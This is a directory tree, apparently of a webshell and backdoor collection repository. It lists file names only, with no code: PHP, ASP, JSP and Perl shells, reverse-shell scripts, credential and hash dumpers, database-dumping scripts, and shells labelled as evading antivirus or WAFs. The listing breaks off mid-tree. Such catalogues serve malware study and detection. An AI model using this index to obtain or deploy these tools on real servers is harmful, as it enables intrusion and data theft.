├── 138shell ├── A │ ├── Ajan.asp.txt │ ├── Ajax_PHP Command Shell.txt │ ├── Antichat Shell v1.3.txt │ ├── Asmodeus v0.1.pl.txt │ ├── Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt │ ├── aZRaiLPhp v1.0.txt │ └── accept_language.txt ├── B │ ├── Blind Shell.cpp.txt │ ├── backdoor1.txt │ ├── backdoorfr.txt │ ├── backup.php.txt │ ├── backupsql.php.txt │ └── backupsql.txt ├── C │ ├── CMD.asp.txt │ ├── Casus15.php.txt │ ├── CmdAsp.asp.txt │ ├── Crystal.txt │ ├── CyberSpy5.Asp.txt │ ├── c100.txt │ ├── c2007.php.txt │ ├── c99(1).php.txt │ ├── c99.txt │ ├── cgi-python.py.txt │ ├── connectback2.pl.txt │ ├── ctt_sh.php.txt │ ├── ctt_sh.txt │ ├── cybershell.php.txt │ └── cybershell.txt ├── D │ ├── DTool Pro.txt │ ├── Dive Shell 1.0 - Emperor Hacking Team.txt │ ├── Dx.php.txt │ ├── Dx.txt │ ├── DxShell_hk.php.txt │ └── dC3 Security Crew Shell PRiV.txt ├── E │ ├── EFSO_2.asp.txt │ ├── Elmali Seker.asp.txt │ └── elmaliseker.asp.txt ├── F │ ├── Fatalshell.php.txt │ └── fuckphpshell.txt ├── G │ ├── GFS web-shell ver 3.1.7 - PRiV8.txt │ ├── gfs_sh.php.txt │ └── gfs_sh.txt ├── H │ └── h4ntu shell [powered by tsoi].txt ├── I │ ├── Inderxer.asp.txt │ ├── iMHaPFtp.php.txt │ ├── iMHaPFtp.txt │ ├── img.php.txt │ ├── indexer.asp.txt │ └── ironshell.txt ├── J │ ├── Java Shell.js.txt │ └── JspWebshell 1.2.txt ├── K │ ├── KAdot Universal Shell v0.1.6.html.txt │ └── Klasvayv.asp.txt ├── L │ ├── Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.txt │ ├── lamashell.txt │ ├── load_shell.php.txt │ ├── load_shell.txt │ └── lurm_safemod_on.cgi.txt ├── M │ ├── Moroccan Spamers Ma-EditioN By GhOsT.txt │ ├── MySQL Web Interface Version 0.8.txt │ ├── Mysql interface v1.0.txt │ ├── mailer3.php.txt │ ├── matamu.txt │ ├── myshell.php.txt │ ├── mysql.php.txt │ ├── mysql_shell.txt │ └── mysql_tool.php.txt ├── N │ ├── NCC-Shell.txt │ ├── NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.txt │ ├── NT Addy.asp.txt │ ├── NetworkFileManagerPHP.txt │ ├── Nshell (1).php.txt │ ├── network.php.txt │ ├── nshell.php.txt │ ├── nstview.php.txt │ └── ntdaddy.asp.txt ├── P │ ├── PH Vayv.php.txt │ ├── PHANTASMA.txt │ ├── PHP Backdoor Connect.pl.txt │ ├── PHP Shell.php.txt │ ├── PHPRemoteView.txt │ ├── Phyton Shell.py.txt │ ├── Private-i3lue.txt │ ├── pHpINJ.php.txt │ ├── perlbot.pl.txt │ ├── php-backdoor.txt │ ├── php-include-w-shell.txt │ ├── phpbackdoor15.txt │ ├── phpjackal.txt │ ├── phpshell17.txt │ ├── phvayv.php.txt │ ├── pws.php.txt │ ├── pws.txt │ └── ru24_post_sh.txt ├── R │ ├── Rader.asp.txt │ ├── Rem Exp.asp.txt │ ├── Rem View.php.txt │ ├── Russian.php.txt │ ├── r57 Shell.php.txt │ ├── r57.php.txt │ ├── r577.php.txt │ ├── rootshell.txt │ └── ru24_post_sh.php.txt ├── README.md ├── S │ ├── Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt │ ├── Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.txt │ ├── Server Variables.asp.txt │ ├── SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.txt │ ├── SimShell 1.0 - Simorgh Security MGZ.txt │ ├── Sincap.php.txt │ ├── SnIpEr_SA Shell.txt │ ├── s.php.txt │ ├── s72 Shell v1.1 Coding.txt │ ├── shell.php.txt │ ├── shellbot.pl.txt │ ├── simple-backdoor.txt │ ├── simple_cmd.txt │ ├── smtpd.py.txt │ ├── spy.php.txt │ └── sql.php.txt ├── T │ ├── Test.php.txt │ ├── Tool.asp.txt │ ├── telnet.cgi.txt │ ├── telnet.pl.txt │ └── telnetd.pl.txt ├── U │ └── Uploader.php.txt ├── W │ ├── WebShell.cgi.txt │ ├── WinX Shell.txt │ ├── Worse Linux Shell.txt │ ├── w.php.txt │ ├── w3d.php.txt │ ├── w4k.php.txt │ ├── wacking.php.txt │ └── webshell.txt ├── X │ └── xinfo.php.txt └── Z │ ├── Zehir 4.asp.txt │ ├── zacosmall.php.txt │ ├── zacosmall.txt │ └── zehir4.asp.txt ├── Backdoor Dev Shells ├── Source │ ├── devilzShell.asp │ ├── devilzShell.aspx │ ├── devilzShell.cgi │ ├── devilzShell.jsp │ └── devilzShell.php ├── devshell.asp ├── devshell.aspx ├── devshell.cfm ├── devshell.cgi ├── devshell.jsp ├── devshell.php └── readme.md ├── README.md ├── asp ├── 08小组内部交流专用.asp.txt ├── 1d.asp ├── 2013110125027897.asp ├── 404.asp ├── 80sec内部专用过世界杀软休积最小功能超强超猛宇宙第一asp.txt ├── ASPXspy2.aspx ├── ASP一句话.txt ├── ASP一句话02.txt ├── Ajan.asp ├── Asp最新变形一句话.asp ├── Asp最新变形一句话2014-11-21.asp.md ├── Cmd支持管理员登陆的webshell.asp ├── CyberSpy5.Asp ├── DarkBlade1.5.asp ├── EFSO_2.asp ├── Expdoor.com ASP专用小马.asp ├── Inderxer.asp ├── RadHat-webshell-del-backdoor │ ├── 加密版.asp │ └── 明文版.asp ├── Rader.asp ├── RemExp.asp ├── Server Variables.asp ├── ajn.asp ├── ajs │ ├── readme.md │ ├── shell.asp │ └── shell_decoded.asp ├── aspydrv.asp.txt ├── bypass-iisuser-p.asp ├── bypass-waf.asp ├── cmd.asp.txt ├── con2.asp ├── cpanel.asp ├── grasp.asp ├── hididi.net.txt ├── ice.asp ├── killdoor.txt ├── klasvayv.asp ├── lpl38-com-RedHat │ ├── radhat.asp │ ├── readme.txt │ └── 解包unpack.vbs ├── lpl38-com-redhat.asp.txt ├── luoss.asp.txt ├── mumaasp.com.asp ├── nonoseed0121.asp.txt ├── r00ts无FSO组建大马.asp ├── shell.asp ├── test.asp.txt ├── vps提权马.asp ├── xx.asp ├── 不带引号的Asp一句话.asp ├── 不灭之魂.asp └── 传说中的hcker.asp.txt ├── aspx ├── 111.aspx ├── 2013110125222650.aspx ├── ASPXspy2.aspx ├── ASPX一句话 ├── ASPX一句话02.txt ├── AspxSpy2014Final.aspx ├── Aspx一句话木马小集.aspx ├── Nightrunner.aspx%20.txt ├── asp.net-backdoors │ ├── ChangeLog.txt │ ├── cmdexec.aspx │ ├── filesystembrowser.aspx │ ├── fileupload.aspx │ ├── spexec.aspx │ └── sql.aspx ├── aspx下嗅探工具websniff1.0-linux.aspx ├── aspx变形一句话.aspx ├── con2.aspx ├── editor.aspx ├── icesword.aspx ├── lpl38-com-aspx.txt ├── nishang │ ├── .gitattributes │ ├── .gitignore │ ├── Antak-WebShell │ │ ├── Readme.md │ │ └── antak.aspx │ ├── Backdoors │ │ ├── DNS_TXT_Pwnage.ps1 │ │ ├── Execute-OnTime.ps1 │ │ └── HTTP-Backdoor.ps1 │ ├── CHANGELOG.txt │ ├── Escalation │ │ ├── Enable-DuplicateToken.ps1 │ │ └── Remove-Update.ps1 │ ├── Execution │ │ ├── Download-Execute-PS.ps1 │ │ ├── Download_Execute.ps1 │ │ ├── Execute-Command-MSSQL.ps1 │ │ └── Execute-DNSTXT-Code.ps1 │ ├── Gather │ │ ├── Check-VM.ps1 │ │ ├── Copy-VSS.ps1 │ │ ├── Credentials.ps1 │ │ ├── FireBuster.ps1 │ │ ├── FireListener.ps1 │ │ ├── Get-Information.ps1 │ │ ├── Get-LSASecret.ps1 │ │ ├── Get-PassHashes.ps1 │ │ ├── Get-WLAN-Keys.ps1 │ │ └── Keylogger.ps1 │ ├── Misc │ │ ├── Nishang_Logo.png │ │ ├── Nishang_logo_small.png │ │ └── Speak.ps1 │ ├── Pivot │ │ ├── Create-MultipleSessions.ps1 │ │ └── Run-EXEonRemote.ps1 │ ├── Prasadhak │ │ └── Prasadhak.ps1 │ ├── README.md │ ├── Scan │ │ ├── Brute-Force.ps1 │ │ └── Port-Scan.ps1 │ ├── Utility │ │ ├── Add-Exfiltration.ps1 │ │ ├── Add-Persistence.ps1 │ │ ├── Base64ToString.ps1 │ │ ├── Do-Exfiltration.ps1 │ │ ├── Download.ps1 │ │ ├── ExetoText.ps1 │ │ ├── Invoke-Decode.ps1 │ │ ├── Invoke-Encode.ps1 │ │ ├── Parse_Keys.ps1 │ │ ├── Remove-Persistence.ps1 │ │ ├── StringToBase64.ps1 │ │ └── TexttoExe.ps1 │ ├── nishang.psm1 │ └── powerpreter │ │ ├── Powerpreter.psm1 │ │ └── README.md ├── wso.aspx └── z1(1).txt ├── caidao-shell ├── 404.php ├── README.md ├── aspx.jpg ├── caidao-plug │ ├── ASP读终端端口.ccc │ ├── Aspx文件搜索.ccc │ ├── Aspx设置权限.ccc │ ├── PHP批量挂马.ccc │ ├── README.md │ ├── asp目录写权限检测.ccc │ ├── php_HTTP代理.ccc │ ├── phpspy2011.ccc │ ├── php端口转向.ccc │ └── 扫描端口_php.ccc ├── download 下载文件.asp ├── fuck.php ├── guo.php ├── hkmjj.asp ├── ice.asp ├── ice.aspx ├── ice.cfm ├── ice.jpg ├── ice.jsp ├── ice.php ├── mdb.asp ├── php.jpg ├── redirect.asp ├── toby57解析加密一句话木马.php ├── 强悍.php ├── 菜刀jsp修改.jsp └── 说明.log ├── drag ├── README.md ├── asp wget drag database.asp.txt ├── jsp wget drag database.jsp.txt ├── mysql_jsp脱裤.txt ├── mysql数据库脱单个表.jsp ├── oracle_jsp脱裤.txt ├── oracle脱裤脚本.jsp ├── php wget drag database.php 2.txt ├── php wget drag database.php.txt ├── system.jsp └── 脱mysql数据库.jsp ├── fuzzdb-webshell ├── README.md ├── asp │ ├── cmd-asp-5.1.asp │ ├── cmd.asp │ ├── cmd.aspx │ ├── cmdasp.asp │ ├── cmdasp.aspx │ ├── list.asp │ ├── list.txt │ ├── ntdaddy.asp │ └── up.asp ├── c │ └── cmd.c ├── cfm │ ├── cfExec.cfm │ ├── cfSQL.cfm │ └── cmd.cfm ├── jsp │ ├── CmdServlet.class │ ├── CmdServlet.java │ ├── ListServlet.class │ ├── ListServlet.java │ ├── UpServlet.class │ ├── UpServlet.java │ ├── browser.jsp │ ├── cmd.jsp │ ├── cmdjsp.jsp │ ├── jsp-reverse.jsp │ ├── list.jsp │ ├── up.jsp │ └── win32 │ │ ├── cmd_win32.jsp │ │ └── up_win32.jsp ├── php │ ├── cmd.php │ ├── list.php │ ├── php-backdoor.php │ ├── simple-backdoor.php │ └── up.php ├── pl-cgi │ ├── cmd.pl │ ├── list.pl │ ├── perlcmd.cgi │ └── up.pl ├── servlet │ ├── CmdServlet.java │ ├── ListServlet.java │ └── UpServlet.java └── sh │ ├── cmd.sh │ ├── list.sh │ └── up.sh ├── jsp ├── 000.jsp ├── 0000.jsp ├── 1.jsp ├── 102.jsp ├── 123.jsp ├── 12302.jsp ├── 2.jsp ├── 201.jsp ├── 3.jsp ├── 400.jsp ├── 403.jsp ├── 404.jsp ├── 520.jsp ├── 807.jsp ├── Chropper for jsp │ ├── Chropper.java │ ├── 菜刀jsp脚本文明版.jsp │ ├── 菜刀jsp脚本无压缩版.jsp │ ├── 菜刀jsp脚本更新版.jsp │ └── 菜刀脚本连接数据库问题.txt ├── IXRbE.jsp ├── IXRbE02.jsp ├── JFolder.jsp ├── JSP一句话 ├── JSP菜刀一句话木马.jsp ├── Java Shell.jsp ├── JspSpy.jsp ├── JspSpy1.jsp ├── JspSpyJDK5.jsp ├── JspSpyJDK51.jsp ├── JspWebshell 1.2.jsp ├── ROOTtows.jsp ├── Silic.jsp ├── a.jsp ├── action.jsp ├── asd.jsp ├── c5.jsp ├── cat │ ├── 1.jpg │ ├── 2.jpg │ ├── 3.jpg │ ├── 4.jpg │ ├── 5.jpg │ ├── 6.jpg │ ├── Cat.java │ ├── cat.jar │ ├── cat.jsp │ ├── catjsp.md │ ├── cmd1.jsp │ ├── cmd2.jsp │ ├── readme.md │ └── test.php ├── cmdjsp.jsp ├── cofigrue.jsp ├── config.jsp ├── css.jsp ├── customize.jsp ├── data.jsp ├── data02.jsp ├── date.jsp.txt ├── dm.jsp ├── edit_ot.jsp ├── guige.jsp ├── guige02.jsp ├── hackk8 │ ├── JSP │ │ ├── Customize.jsp │ │ ├── JSP无组件实现WEB上传.rar │ │ ├── Java Shell.jsp │ │ ├── JspWebshell 1.2.jsp │ │ ├── cmdjsp.jsp │ │ ├── jsp-reverse.jsp │ │ ├── jspspy有屏幕.txt │ │ ├── minupload.jsp │ │ └── other │ │ │ ├── download.jsp │ │ │ ├── jspspy.jsp │ │ │ ├── jspspy_k8.jsp │ │ │ └── thx.jsp │ ├── JSP_66 │ │ ├── Customize.jsp │ │ ├── JSP无组件实现WEB上传.rar │ │ ├── Java Shell.jsp │ │ ├── JspWebshell 1.2.jsp │ │ ├── cmdjsp.jsp │ │ ├── jsp-reverse.jsp │ │ ├── minupload.jsp │ │ └── other │ │ │ ├── download.jsp │ │ │ ├── jspspy.jsp │ │ │ ├── jspspy_k8.jsp │ │ │ └── thx.jsp │ ├── Struts2下shell兼容性报告_K8.txt │ ├── fuck-jsp │ │ ├── JFolder.jsp │ │ ├── JspSpyJDK5.jsp │ │ ├── in.jsp │ │ ├── job.jsp │ │ ├── jspbrowser │ │ │ ├── 1.jsp │ │ │ ├── 2.jsp │ │ │ ├── Browser.jsp │ │ │ ├── Readme.txt │ │ │ ├── example-css.css │ │ │ └── gpl.txt │ │ ├── ma1.jsp │ │ ├── ma2.jsp │ │ ├── ma3.jsp │ │ ├── ma4.jsp │ │ ├── no.jsp │ │ ├── silic webshell.jsp │ │ └── spjspshell.jsp │ ├── jsp2 │ │ ├── CmdServlet.class │ │ ├── CmdServlet.java │ │ ├── ListServlet.class │ │ ├── ListServlet.java │ │ ├── UpServlet.class │ │ ├── UpServlet.java │ │ ├── browser.jsp │ │ ├── cmd.jsp │ │ ├── cmdjsp.jsp │ │ ├── jsp-reverse.jsp │ │ ├── list.jsp │ │ ├── up.jsp │ │ └── win32 │ │ │ ├── cmd_win32.jsp │ │ │ └── up_win32.jsp │ └── jsp_77 │ │ ├── CmdServlet.class │ │ ├── CmdServlet.java │ │ ├── ListServlet.class │ │ ├── ListServlet.java │ │ ├── UpServlet.class │ │ ├── UpServlet.java │ │ ├── browser.jsp │ │ ├── cmd.jsp │ │ ├── cmdjsp.jsp │ │ ├── jsp-reverse.jsp │ │ ├── list.jsp │ │ ├── up.jsp │ │ └── win32 │ │ ├── cmd_win32.jsp │ │ └── up_win32.jsp ├── he1p.jsp ├── hsxa.jsp ├── hsxa1.jsp ├── icesword.jsp ├── in.jsp ├── inback3.jsp ├── index_bak1.jsp ├── index_sys.jsp ├── indexop.jsp.上传.jsp ├── info.jsp ├── java │ ├── java_faces_shell.xhtml │ └── readme.md ├── jdbc.jsp ├── jfolder01.jsp ├── job.jsp ├── jshell.jsp ├── jsp-reverse.jsp ├── jsp.jsp ├── jsp.txt ├── jspbrowser │ ├── 1.jsp │ ├── 2.jsp │ ├── Browser.jsp │ ├── Readme.txt │ ├── example-css.css │ └── gpl.txt ├── jspspy │ ├── JspSpy.jsp │ ├── JspSpy1.jsp │ ├── JspSpyJDK5.jsp │ ├── JspSpyJDK51.jsp │ ├── Jspspyweb.jsp │ └── 使用说明.txt ├── jweevely.md ├── k81.jsp ├── k8cmd.jsp ├── ks0ljvi9m2.txt ├── leo.jsp ├── list1.jsp ├── luci.jsp.spy2009.jsp ├── m.jsp ├── ma (1).jsp ├── ma.jsp ├── ma1.jsp ├── ma2.jsp ├── ma3.jsp ├── ma4.jsp ├── maint.jsp ├── mg.jsp ├── mmym520.jsp ├── myxx.jsp ├── myxx1.jsp ├── no.jsp ├── nogfw.jsp ├── ok.jsp ├── one8.jsp ├── pyth.jsp ├── queryDong.jsp ├── shell.jsp ├── silic webshell.jsp ├── spjspshell.jsp ├── spyjsp2010.jsp ├── struts2 │ ├── dict.txt │ └── webshell.txt ├── style.jsp ├── suiyue.jsp ├── sys3.jsp ├── system1.jsp.上传.jsp ├── t.jsp ├── t00ls.jsp ├── tree.jsp ├── u.jsp ├── utils.jsp ├── ver007.jsp ├── ver008.jsp ├── warn.jsp ├── web.jsp ├── web02.jsp ├── webshell-nc.jsp ├── x7.jsp ├── xia.jsp ├── xm.jsp ├── xx.jsp ├── zend.jsp ├── zval.jsp ├── zx.jsp └── 新型JSP小马支持上传任意格式文件.jsp ├── jspx ├── Ends │ ├── Readme.md │ └── base64.jspx.txt ├── cmd.jspx ├── jspspy.jspx ├── jspx.jspx ├── jsp一句话.txt └── paxmac.jspx ├── net-friend ├── ChatRoom │ ├── 菊花聊天室.asp │ └── 菊花聊天室.php ├── asp │ ├── 01.asp │ ├── 1.asp │ ├── 121.jpg │ ├── DarkBlade1.3--强大的asp大马 │ │ └── indexx.asp │ ├── asp目录可写扫描 │ │ ├── 01.aspx │ │ ├── 1.aspx │ │ ├── finaly.aspx │ │ ├── wt.asp │ │ └── wt.aspx │ ├── google.jpg │ ├── mssql在线管理.asp │ ├── 一句话.doc │ ├── 修改属性.asp │ └── 陆羽asp打包 │ │ ├── 1.bat │ │ ├── cscript.exe │ │ ├── dabao.asp │ │ └── unpack.vbs ├── aspx │ ├── 01.aspx │ ├── 1----环境检测功能非常不错.aspx │ ├── 1.aspx │ ├── 11.aspx │ ├── ASP.NET Web BackDoor.aspx │ ├── Aspx(免杀).aspx │ ├── aspx.aspx │ ├── aspxspy.aspx │ ├── aspxspy │ │ ├── 1.aspx │ │ ├── aspxspy.aspx │ │ └── read.txt │ ├── read.txt │ ├── sniffer--aspx的嗅探工具.aspx │ ├── view.aspx │ ├── 干净清爽的大马,不怎么好用.aspx │ └── 脱裤4ngle.aspx ├── cfm │ ├── ColdFusion.chm │ ├── cfmShell.cfm │ ├── cmfshell.cmf │ ├── list.cfm │ ├── mycode12.cfm │ └── xl.cfm ├── cgi │ └── WebShell.cgi ├── jsp │ ├── JFolder.jsp │ ├── JspSpyJDK5.jsp │ ├── in.jsp │ ├── job.jsp │ ├── jspbrowser │ │ ├── 1.jsp │ │ ├── 2.jsp │ │ ├── Browser.jsp │ │ ├── Readme.txt │ │ ├── example-css.css │ │ └── gpl.txt │ ├── ma1.jsp │ ├── ma2.jsp │ ├── ma3.jsp │ ├── ma4.jsp │ ├── no.jsp │ ├── silic webshell.jsp │ └── spjspshell.jsp ├── php │ ├── 2.php │ ├── moon.php │ ├── php一句话后门.TXT │ ├── php网站打包(dodo) │ │ ├── php网站打包(dodo).doc │ │ └── zip.php │ ├── php读取iis.txt │ ├── s-u.php │ └── 零魂PHP一句话木马客户端%28一键提交版%29 │ │ └── 零魂PHP一句话木马客户端(一键提交版) │ │ ├── Readme.txt │ │ └── 零魂PHP一句话木马客户端.htm ├── war │ └── test3693.war └── 可读写目录探测 │ ├── PHP 搜索可读可写目录脚本.php │ ├── 从注册表中读存在路径.aspx │ ├── 啊D小工具 - 目录读写检测 [ASP版].asp │ ├── 啊D小工具 - 目录读写检测 [ASP版]说明.txt │ └── 很好用的扫可读可写目录asp脚本xwdir.asp ├── other shell repository ├── other ├── Axis2Shell │ ├── README.md │ ├── Utils.java │ └── config.aar ├── README.md ├── acat │ ├── ACat-src.zip │ ├── ACat-附数据库驱动-jdk1.5.jar │ ├── ACat-附数据库驱动.jar │ ├── ACat.jar │ ├── ACat_jdk1.5.jar │ └── readme.md ├── bypass_waf.txt ├── cat.aar │ ├── Readme.md │ ├── axis2 利用小工具cat.aar.zip │ └── axis2 利用小工具cat.pdf ├── icesword.war ├── jdk1.3webshell │ ├── readme.MD │ ├── test.ear │ └── test.war ├── ololo.cfm ├── pwd.txt ├── sshback-v0.1.tar.gz ├── webshell-pwd.txt └── zs.war ├── php ├── 12309 │ ├── 12309.php.txt │ └── readme.md ├── 2011.php ├── 404.php ├── 404.php.txt ├── Ani-Shell │ ├── Ani-Shell.php │ └── README.txt ├── BNKQbAKQ.txt ├── Crack8_PHP.txt ├── DAws.md ├── PHPshell │ ├── Antichat Shell v1.3 │ │ ├── Antichat Shell v1.3.php │ │ └── Antichat.jpg │ ├── Crystal │ │ ├── Crystal.jpg │ │ ├── Crystal.php │ │ ├── Crystal2.jpg │ │ └── Crystal3.jpg │ ├── Dx │ │ ├── Dx.jpg │ │ └── Dx.php │ ├── MySQL Web Interface Version 0.8 │ │ ├── MySQL Web Interface Version 0.8.jpg │ │ └── MySQL Web Interface Version 0.8.php │ ├── Mysql interface v1.0 │ │ ├── Mysql interface v1.0.jpg │ │ └── Mysql interface v1.0.php │ ├── NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version │ │ ├── NIX REMOTE WEB-SHELL.jpg │ │ ├── NIX REMOTE WEB-SHELL.php │ │ └── NIX REMOTE WEB-SHELL2.jpg │ ├── NetworkFileManagerPHP │ │ ├── NetworkFileManagerPHP.jpg │ │ ├── NetworkFileManagerPHP.php │ │ └── NetworkFileManagerPHP2.jpg │ ├── PH Vayv │ │ ├── PH Vayv.jpg │ │ └── PH Vayv.php │ ├── PHP Shell │ │ ├── PHP Shell.jpg │ │ ├── PHP Shell.php │ │ ├── PHP Shell2.jpg │ │ └── PHP Shell3.jpg │ ├── PHPRemoteView │ │ ├── PHPRemoteView.jpg │ │ ├── PHPRemoteView.php │ │ └── PHPRemoteView2.jpg │ ├── SnIpEr_SA Shell │ │ ├── SnIpEr_SA Shell.jpg │ │ └── SnIpEr_SA Shell.php │ ├── c99 │ │ ├── c99.jpg │ │ └── c99.php │ ├── c99_PSych0 │ │ ├── c99_PSych0.jpg │ │ └── c99_PSych0.php │ ├── c99_locus7s │ │ ├── c99_locus7s.jpg │ │ ├── c99_locus7s.php │ │ └── c99_locus7s2.jpg │ ├── c99_w4cking │ │ ├── c99_w4cking.jpg │ │ ├── c99_w4cking.php │ │ └── c99_w4cking2.jpg │ ├── c99shell │ │ ├── c99shell.jpg │ │ └── c99shell.php │ ├── ctt_sh │ │ ├── ctt_sh.jpg │ │ └── ctt_sh.php │ ├── gfs_sh │ │ ├── gfs_sh.jpg │ │ ├── gfs_sh.php │ │ └── gfs_sh2.jpg │ ├── iMHaPFtp │ │ ├── iMHaPFtp.jpg │ │ └── iMHaPFtp.php │ ├── nstview │ │ ├── nstview.jpg │ │ ├── nstview.php │ │ └── nstview2.jpg │ ├── r57shell │ │ ├── r57shell.jpg │ │ └── r57shell.php │ ├── r57shell127 │ │ ├── r57shell127.jpg │ │ └── r57shell127.php │ ├── zacosmall │ │ ├── zacosmall.jpg │ │ └── zacosmall.php │ ├── 【C99madShell v. 3.0】 │ │ ├── C99madShell v. 3.0.jpg │ │ └── smowu.php │ ├── 【EgY_SpIdEr ShElL V2】 │ │ ├── EgY_SpIdEr ShElL V2.php │ │ ├── EgY_SpIdEr ShElL V2.php.jpg │ │ └── EgY_SpIdEr ShElL V2.php2.jpg │ ├── 【PHPJackal v1.5】 │ │ ├── PHPJackal v1.5.jpg │ │ └── PHPJackal v1.5.php │ ├── 【PHPJackal】 │ │ ├── PHPJackal.jpg │ │ ├── PHPJackal.php │ │ └── PHPJackal2.jpg │ ├── 【Shell [ci] .Biz was here】 │ │ ├── Shell [ci] .Biz was here.jpg │ │ └── Shell [ci] .Biz was here.php │ ├── 【c99_madnet】 │ │ ├── c99_madnet.jpg │ │ ├── c99_madnet2.jpg │ │ ├── smowu.php │ │ ├── 密码.txt │ │ └── 连接密码.jpg │ ├── 【ironshell】 │ │ ├── ironshell.jpg │ │ ├── ironshell.php │ │ └── 密码.txt │ ├── 【phpshell-2.1】 │ │ ├── INSTALL │ │ ├── config.php │ │ ├── phpshell3.jpg │ │ ├── phpshell3.php │ │ ├── pwhash.php │ │ ├── style.css │ │ └── 备注.txt │ ├── 【r57_Mohajer22】 │ │ ├── r57_Mohajer22.jpg │ │ ├── r57_Mohajer22.php │ │ └── r57_Mohajer222.jpg │ ├── 【r57_iFX】 │ │ ├── r57.jpg │ │ ├── r572.jpg │ │ └── r57_iFX.php │ ├── 【r57_karta】 │ │ ├── r57_kartal.jpg │ │ ├── r57_kartal.php │ │ └── r57_kartal2.jpg │ └── 【r57】 │ │ ├── r57.jpg │ │ ├── r57.php │ │ └── r572.jpg ├── PHP简单小马源码.php ├── Phpspy 2010 身份验证绕过漏洞 ├── Phpspy 2011 继续身份验证绕过漏洞 ├── README.md ├── Resume.php.txt ├── aioshell.php ├── angel大马.php ├── b374k │ ├── README.md │ ├── b374k-2.2.min.php │ ├── b374k-2.2.poly.php │ ├── b374k-2.3.min.php │ ├── b374k-2.3.poly.php │ ├── b374k-2.4.min.php │ ├── b374k-2.4.poly.php │ ├── b374k-2.5.php │ ├── b374k-2.6.php │ ├── b374k-2.7.php │ ├── b374k-2.8.php │ ├── b374k-3.2.2.min.php │ ├── b374k-3.2.2.php │ ├── b374k-3.2.3.min.php │ ├── b374k-3.2.3.php │ └── source │ │ ├── b374k-2.2.php │ │ ├── b374k-2.3.php │ │ ├── b374k-2.4.php │ │ ├── b374k-2.5.source.php │ │ ├── b374k-2.6.source.php │ │ ├── b374k-2.7.source.php │ │ ├── b374k-2.8.source.php │ │ └── b374k-3.2.2.php ├── blackbin │ ├── 404super.php │ └── v1 │ │ ├── code.php │ │ ├── dev_core.php │ │ ├── make2.php │ │ └── readme.md ├── carbylamine.txt ├── fbi.php ├── ghost.php ├── ghost_source.php ├── h6ss.php ├── icesword.php ├── img │ ├── 20140901-01.png │ ├── 20140901-02.png │ ├── 20140901-03.jpg │ ├── 20140901-04.jpg │ ├── 20140901-05.jpg │ └── 20140901-06.png ├── indrajith-2.0.txt ├── indrajith.txt ├── itsec.php ├── koplak_php%3Bme.txt ├── lpl38-com-php.txt ├── mof提权带回显带清楚命令版本.php ├── oi.php.decode.txt ├── oi.php.txt ├── other-decode.php ├── other.php ├── p2j │ ├── 11.jpg │ ├── PHP reflection.php.txt │ ├── PHP反射后门.php.txt │ └── Readme.md ├── pHp一句话扫描脚本程序.php ├── pas │ ├── pas.php │ └── password.txt ├── pass-waf-2014-10-19.php ├── php-extension-backdoor.md ├── php-sh │ ├── client.py │ └── server.php ├── php-xor.md ├── php-xor.php.md ├── phpkit-0.1a │ ├── README │ ├── odd.php │ └── phpkit.py ├── phpkit-0.2a │ ├── CHANGELOG │ ├── README │ ├── odd.php │ ├── phpkit.py │ └── upload.py ├── phpkit-1.0 │ ├── README.txt │ ├── odd.php │ └── phpkitcli.py ├── phpshell.php.txt ├── phpspy │ ├── 2008.php │ ├── 2009lite.php │ ├── 2009mssql.php │ ├── 2011.php │ ├── 2013加密.php │ ├── 2013未加密.php │ ├── 2014phpspy.php │ ├── phpspy2010.php │ ├── phpspy_2005_full.php │ ├── phpspy_2005_lite.php │ └── phpspy_2006.php ├── phpwebshell pass by waf for share.md ├── php一句话 ├── php一句话02.txt ├── php版iisspy.php ├── poison.php ├── priv8-2012-bypass-shell.php.txt ├── priv95.php.txt ├── r00ts php大马.php ├── reverseshell-poc.txt ├── s.php.txt ├── shell.php ├── shell.php.txt ├── silic.php ├── spy.php ├── supers.php ├── sure.php_.txt ├── tiamo.php.decode.txt ├── tiamo.php.txt ├── webshell-123.php ├── webshell-cnseay-x.php ├── webshell-cnseay02-1.php ├── wsb │ ├── ReadMe.txt │ ├── idc.php │ └── wsb.pl ├── wso │ ├── wso2.php │ └── wso2_pack.php ├── wso2.5.1.php ├── wso2.php.txt ├── xiao.php.txt ├── yyihacker.php.txt ├── 一个过安全狗的pHp一句话.php ├── 不带引号的pHp一句话.php ├── 另类PHP一句话小马.md ├── 国外某论坛不含Get,Post的pHp一句话.php ├── 极其隐蔽的pHp小马穿插在正常页面中.php ├── 某变异pHp一句话木马.php ├── 牛X的pHp一句话.php ├── 过各大杀软的pHp一句话.php └── 非常规的pHp一句话木马.php ├── pl ├── Silic Group_cgi.pl ├── Silic Group_readme.txt ├── WebShell.cgi.pl ├── exim.pl ├── hmass (priv8 mass defacor).pl ├── inc.pl ├── ka0tic.pl ├── lurm_safemod_on.cgi.pl ├── perlwebshell-0.1 │ ├── AUTHORS │ ├── COPYING │ ├── ChangeLog │ ├── INSTALL │ ├── README │ └── perlwebshell.cgi ├── pps-pl │ ├── pps-v1.0.pl │ ├── pps-v3.0.pl │ ├── pps-v3.5.pl │ └── pps-v4.0.pl ├── rcpexp.pl ├── remot shell.pl ├── telnet.cgi.pl └── telnet.pl ├── py ├── Phyton Shell.py ├── cgi-python.py ├── d00r_py3.py ├── darkBC.py.txt ├── sctp_reverse.py.txt ├── smtpd.py └── xshock-0.1.tar.gz ├── web-malware-collection-13-06-2012 ├── ASP │ ├── 3fexe.txt │ ├── ASpy.txt │ ├── EFSO.txt │ ├── ELMALISEKER Backd00r.asp │ ├── NTDaddy.v1.9.txt │ ├── RHTools.v1.5-BETA.txt │ ├── RemExp.asp │ ├── Server Variables.asp │ ├── aspSH.v1.txt │ ├── aspxSH.txt │ ├── aspxshell.aspx.txt │ ├── aspydrv.asp │ ├── aspydrv.txt │ ├── cmd.asp │ ├── cmd.aspx │ ├── cmdexec.aspx │ ├── elmaliseker.asp │ ├── filesystembrowser.aspx │ ├── fileupload.aspx │ ├── list.asp │ ├── ntdaddy.asp │ ├── spexec.aspx │ ├── sql.aspx │ ├── tool.asp │ ├── toolaspshell.txt │ ├── up.asp │ ├── zehir.asp │ ├── zehir.txt │ ├── zehir4.asp │ └── zehir4.txt ├── JSP │ ├── 